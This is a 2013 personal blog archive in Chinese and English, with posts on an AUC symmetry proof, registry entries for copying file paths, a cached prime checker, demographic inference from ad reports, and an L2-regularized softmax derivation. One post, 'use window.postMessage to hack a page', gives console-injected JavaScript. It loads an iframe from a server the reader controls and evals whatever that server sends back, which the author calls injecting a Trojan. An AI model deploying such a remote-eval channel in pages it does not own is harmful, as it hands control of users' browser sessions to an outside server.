2013年12月29日星期日

Fwd: An interesting property of AUC

Get definition of AUC here


Property: if you flip ground truth only, or flip prediction only, you will get 1-original AUC as new AUC.

Proof:
Take original ROC curve as function of moving score threshold (x(s),y(s))=(fp(s)/N, tp(s)/P)
Where fp(s) is false positive=number of cases predicted as positive under score threshold s but actually negative.
tp(s) is true postive=number of cases predicted as positive and actually also positive.
N is number of negative cases and P is number of positive cases.

1. Flip ground truth only
You will get P'=N and N'=P. Note that prediction is kept unchanged, so fp'(s)=tp(s), tp'(s)=fp(s).
As a result, (x'(s),y'(s))=(y(s),x(s)), which means the two curves are symmetric to line y=x.
So, the area a is the same as area c.
Note that a+b+c=1, so a+(a+b)=1 where a and a+b are AUC before and after ground truth flip.

2. Flip prediction only
You will get N'=N, P'=P, fp'(s)=N-fp(s) and tp'(s)=P-tp(s). 
As a result, (x'(s),y'(s))=(1-x(s), 1-y(s)), which means the cuve flip according to line x=1/2 and then flip according to line y=1/2.
Note that the flip horizontal never change the area under the curve.
while flip vertical make the curve top down, that is to say, the area under the new curve is the area above the original curve.
So AUC+AUC'=1.
#



    

2013年12月2日星期一

Fwd: Copy path in context menu



Copy, save and click to add into regedit.

 

 

Add Copy as Path Option.reg

-----------

 

 

Windows Registry Editor Version 5.00

 

;Created by Vishal Gupta for AskVG.com

 

[HKEY_CLASSES_ROOT\*\shell\Copy Full Path]

 

[HKEY_CLASSES_ROOT\*\shell\Copy Full Path\command]

@="cmd.exe /c echo %1|clip"

 

 

[HKEY_CLASSES_ROOT\*\shell\Copy Filename]

 

[HKEY_CLASSES_ROOT\*\shell\Copy Filename\command]

@="cmd /c for %%i in (\"%1\") do @echo %%~nxi | clip"

 

 

[HKEY_CLASSES_ROOT\*\shell\Copy Dir Path]

 

[HKEY_CLASSES_ROOT\*\shell\Copy Dir Path\command]

@="cmd /c for %%i in (\"%1\") do @echo %%~dpi | clip"

 

 

[HKEY_CLASSES_ROOT\Directory\shell\Copy Dir Path]

 

[HKEY_CLASSES_ROOT\Directory\shell\Copy Dir Path\command]

@="cmd.exe /c echo %1|clip"

 

=======

 

Remove Copy as Path Option.reg

----------

 

Windows Registry Editor Version 5.00

 

;Created by Vishal Gupta for AskVG.com

 

[-HKEY_CLASSES_ROOT\*\shell\Copy Full Path]

 

[-HKEY_CLASSES_ROOT\*\shell\Copy Filename]

 

[-HKEY_CLASSES_ROOT\*\shell\Copy Dir Path]

 

[-HKEY_CLASSES_ROOT\Directory\shell\Copy Dir Path]

 

 

 

 

 

=======

 

 

Enjoy~

 


2013年6月24日星期一

Prime Checker With Cache

如果需要频繁检查某个数是否是素数,可以把查过的素数缓存下来。
 
 

class PrimeCheckerWithCache:
 def __init__(self):
  self.primeSet=set([2,3])
  self.maxTested=4
 def isPrim(self, test):
  #cache hit
  if test<=self.maxTested:
   return test in self.primeSet
  #test and update cache
  for i in range(self.maxTested+1,test+1):
   if not any([i%p==0 for p in self.primeSet]):
    self.primeSet.add(i)
  self.maxTested=test
  return test in self.primeSet 
 
 
正确性证明:
不变量:primeSet中是不超过maxTested的全部素数。
初始:手动设置,成立。
保持:注意到,每次加入primeSet的,总是不能被任何已知素数整除的最小的自然数,也就是primeSet之外最小的素数。因此不变量保持。

因为素数密度很小,所以都缓存下来在规模较小时是可行的。

关于素数密度(不超过n的素数个数/n),我最近学习到有一些有意思的事实
1、素数无穷多
2、素数的密度收敛到0
3、素数的密度比平方数大:)呵呵没想到吧

2013年6月2日星期日

Demographic prediction over aggregated data set

Sometimes you may have no explicit demographic data you desired, P(D|C), where C is the content (page/video/game or whatever you offer) the visitor is consuming and D is the visitor demographic bucket, but you can get some aggregated report from third party, in this schema: P(A,D), here A is the advertisement.
If you own the ad system, you can know P(A|C) because you know where does each ad target. Even if advertisers didn't explicityly target on any content, and you are optimizting for advertiser, you can simulate so as to get P(A|C).
For a fixed demographic bucket, D, we have a linear equation:
P(A|D)=SUM{P(A|C)*P(C|D), foreach C}
We can solve (approximately) P(C|D) using least square.
Finally, we calculate P(D|C) propotional to P(C|D)P(D).
 
To evaluate if the model works, you can use April data to train a model P(C|D), and then predict P(A|D) for May, and compare it to the truth report P(A,D). Here we assume P(D) and P(C|D) is relatively stable over time, while advertisements booked in the system change frequently.
 
A trouble might be that the content in your network also change frequently, then you have to generalize your content from specific item, such as page URL to page content topic or video id to series.
 
Summarize the idea:
Audience has some demographic property and as a result, he/she is interested in some topic of content. As he/she is consuming some content, some ad is shown to him and you get a ad-demo distribution report. The model above is trying to address the connection between demographic and content topic.

2013年4月5日星期五

use window.postMessage to hack a page

Just wondering to if I can ingest a Trojan into a page, and my server can control the client to run any javascript. Here I get a solution: https://developer.mozilla.org/en-US/docs/DOM/window.postMessage
 
Type F12 in Chrome and paste the following js code in Console:
 
//inject iframe window
var body = document.getElementsByTagName('body' )[0];
var iframe = document.createElement('iframe' );
iframe.id = "proxy_iframe";
iframe.src = 'http://localhost:24189/';
body.appendChild(iframe);

//register callback
function receiveMessage(event) {
    eval( "("+event.data+ ")();" );
}
window.addEventListener( "message", receiveMessage, false);

//invoke
window.setTimeout( function() {
    iframe.contentWindow.postMessage( "0" , "*" );
}, 1000);
 
Replace localhost:24189 to the server you can control.
 
On server you can response a HTML like this:
 
< html>
    <head >
        < title> Proxy</ title >
        < script>
            //return a function to exec in host
            function loop(args) {
                return function () {
                    function crawl(url) {
                        alert(url);
                    }
                    crawl(( new Date()).toString());
                    window.setTimeout( function () {
                        iframe.contentWindow.postMessage( "0" , "*" );
                    }, 1000);
                };
            }

            window.onload = function() {

                function receiveMessage(event) {
                    event.source.postMessage(loop(event.data).toString(), event.origin);
                }

                window.addEventListener( "message" , receiveMessage, false );
            };
        </ script></ head ><body ></ body>
</ html>
The magic here is you can serialize a function as a string from your server to the host page, and run the script in the host page. Don't forget, in the end of the function, to use window.setTimeout to let the host page find more jobs from your server later XD.

2013年3月9日星期六

the center of gravity of affinity parameters locates in the origin

在某人的Blog里看到的一个引理,很有意思。才知道L2还有这样一层物理意义。

Modeling

$I$ users, $F$ features and $C$ categories.
Training data: $x_{if}$ is the feature value of user $i$ for feature $f$. $x_{i}$ is the feature vector of user $i$.
Labeling: $y_{ic}$ is the category value of user $i$ for category $c$, for binary categorization, it is in $\{0, 1\}$. In weighed/generalized model, it can be any real number.
Take $\beta_{fc}$ as the affinity parameter (to train) between feature $f$ and category $c$. $\beta_{c}$ is the feature vector of category $c$.

Scoring

$p_{ic}$ is the probability that user $i$ belongs to category $c$.
$p_{ic} \propto e^{x_{i}\beta_{c}}$
Since $\sum_c{p_{ic}}=1$, we have $p_{ic}=\frac{e^{x_{i}\beta_{c}}}{\sum_c{e^{x_{i}\beta_{c}}}}$
We also take $p_{ic}$ as the score of user $i$ for category $c$.

Maximize Likelihood

The likelihood of $\beta$ is
$L(\beta) = \prod_{i,c}{p_{ic}^{y_{ic}}}$
$- ln(L(\beta)) = - \sum_{i,c}{y_{ic}ln(p_{ic})}$
With L2 regularization, we will minimize:
$$\Phi(\beta)= \frac{1}{2}\|\beta\|^2 - \sum_{i,c}{y_{ic}ln(p_{ic})}$$ Calculate the derivative:
Fixing any $f_0 < F, c_0 < C$ $$ \frac{\partial\Phi(\beta)}{\partial \beta_{f_0 c_0}} =\beta_{f_0 c_0} - \sum_{i,c}\frac{y_{ic}}{p_{ic}}\frac{\partial p_{ic}}{\partial \beta_{f_0 c_0}} $$ Where $$ \begin{align*} \frac{\partial p_{ic}}{\partial \beta_{f_0 c_0}} &=\frac{1_{c=c_0} e^{x_{i}\beta_{c}} x_{if_0} \sum_c{e^{x_{i}\beta_{c}}} - e^{x_{i}\beta_{c}} e^{x_{i}\beta_{c_0}} x_{if_0}}{(\sum_c{e^{x_{i}\beta_{c}}})^2} \\ &=1_{c=c_0} p_{ic} x_{if_0} - p_{ic} \frac{e^{x_{i}\beta_{c_0}}}{\sum_c{e^{x_{i}\beta_{c}}}} x_{if_0} \\ &=p_{ic} x_{if_0} (1_{c=c_0} - p_{ic_0}) \end{align*} $$ So $$ \begin{align*} \frac{\partial\Phi(\beta)}{\partial \beta_{f_0 c_0}} &=\beta_{f_0 c_0} - \sum_{i,c}{y_{ic} x_{if_0} (1_{c=c_0} - p_{ic_0})} \\ &=\beta_{f_0 c_0} - \sum_{i}{x_{if_0} (y_{ic_0} - p_{ic_0} \sum_c{y_{ic}})} \end{align*} $$

Lemma 1

Take $\sum_c{y_{ic}}=1$ and ignor regulizer $\beta_{f_0 c_0}$, $$\frac{\partial\Phi(\beta)}{\partial \beta_{f_0 c_0}}=- \sum_{i}{x_{if_0} (y_{ic_0} - p_{ic_0})}$$ If we under score category $c_0$ for all users, that is to say $$p_{ic_0} < y_{ic_0}$$ Then $$\frac{\partial\Phi(\beta)}{\partial \beta_{f_0 c_0}} < 0$$ So we should enlarge $\beta_{f_0 c_0}$

Lemma 2

If $\beta$ is the local minimization point $$\frac{\partial\Phi(\beta)}{\partial \beta_{f_0 c_0}} = 0 , \forall f_0, c_0$$ That is to say $$\beta_{f_0 c_0} = \sum_{i}{x_{if_0} (y_{ic_0} - p_{ic_0} \sum_c{y_{ic}})} , \forall f_0, c_0$$ Summarize over all $c_0$, we have $$\sum_{c_0}{\beta_{f_0 c_0}} = \sum_{i}{x_{if_0}(\sum_{c_0}{y_{ic_0}} - \sum_{c_0}{p_{ic_0}} \sum_c{y_{ic}})} = 0, \forall f_0$$ It means: as long as we have L2 regularization, no matter if $\sum_c{y_{ic}}=1$, the center of gravity of affinity parameters locates in the origin.